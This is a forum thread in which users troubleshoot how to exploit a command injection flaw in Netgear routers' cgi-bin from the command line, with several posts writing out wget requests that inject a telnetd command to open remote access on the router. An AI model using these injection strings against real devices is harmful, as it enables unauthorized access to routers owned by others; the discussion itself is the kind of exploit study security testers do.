anode Posted January 29, 2017 Share Posted January 29, 2017 Been playing with the command injection vuln on the Netgear routers. Works great from a browser. I just have no chops with wget/curl. And would like to exploit via commandline. I've tried: wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23' I've even tried lynx but no love there either. Quote Link to comment Share on other sites More sharing options...
Jamo Posted January 29, 2017 Share Posted January 29, 2017 Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"' Quote Link to comment Share on other sites More sharing options...
anode Posted January 29, 2017 Author Share Posted January 29, 2017 Thanks!! Been messing around with quotes, and made some progress. wget "-IP-/cgi-bin/;telnetd" This works great. But once I try to add/stack it fails. The $IFS (space) matches on both the host and target 21 minutes ago, Jamo said: Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"' Quote Link to comment Share on other sites More sharing options...
digininja Posted January 29, 2017 Share Posted January 29, 2017 What do you mean matches? Quote Link to comment Share on other sites More sharing options...
anode Posted January 29, 2017 Author Share Posted January 29, 2017 4 minutes ago, digininja said: What do you mean matches? $IFS is a space on both systems. Quote Link to comment Share on other sites More sharing options...
digininja Posted January 29, 2017 Share Posted January 29, 2017 I think there is a translation issue, do you mean variable? If you do, then using single quotes means the local shell won't treat it as a variable. Quote Link to comment Share on other sites More sharing options...
anode Posted January 29, 2017 Author Share Posted January 29, 2017 I've swapped around the single double quotes in all sorts of combos. $IFS as a shell variable. Its equated to a space. (on both systems) It works *perfectly* inside a web browser. I'm trying to get it to work with wget or curl. Getting telnet running on default port 23 is no prob. But would be nice to add arguments and options to do a 'killall' (and I *do* thank you for your all your help (globally here). You're a good/helpful guy here. ...When Diginija speak, hackers listen (old US inside joke) 33 minutes ago, digininja said: I think there is a translation issue, do you mean variable? If you do, then using single quotes means the local shell won't treat it as a variable. Quote Link to comment Share on other sites More sharing options...
digininja Posted January 29, 2017 Share Posted January 29, 2017 Either without quotes, or in double quotes, strings starting with dollar signs are treated as variables, in single quotes they are treated as literals as you can see in this screenshot. What is your exact problem, from your last post it doesn't sound like it is the variables that are causing you the issues. Quote Link to comment Share on other sites More sharing options...
digip Posted January 31, 2017 Share Posted January 31, 2017 On 1/29/2017 at 5:35 PM, kdodge said: it looks like his trying to exec the telnetd on the router, you could try the %20 for a space wget 'http:///cgi-bin/;telnetd%20-p%2023' or just a regular space wget 'http:///cgi-bin/;telnetd -p 23' was going to suggest url encoding as you did. %27 for single quote(if needed anywhere) and %20 for spaces. Wrapping the whole request in single or double quotes should work with regular spaces though without the need for $IFS(whatever that is) unless $IFS was a needed part of the attack string/escape sequence. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.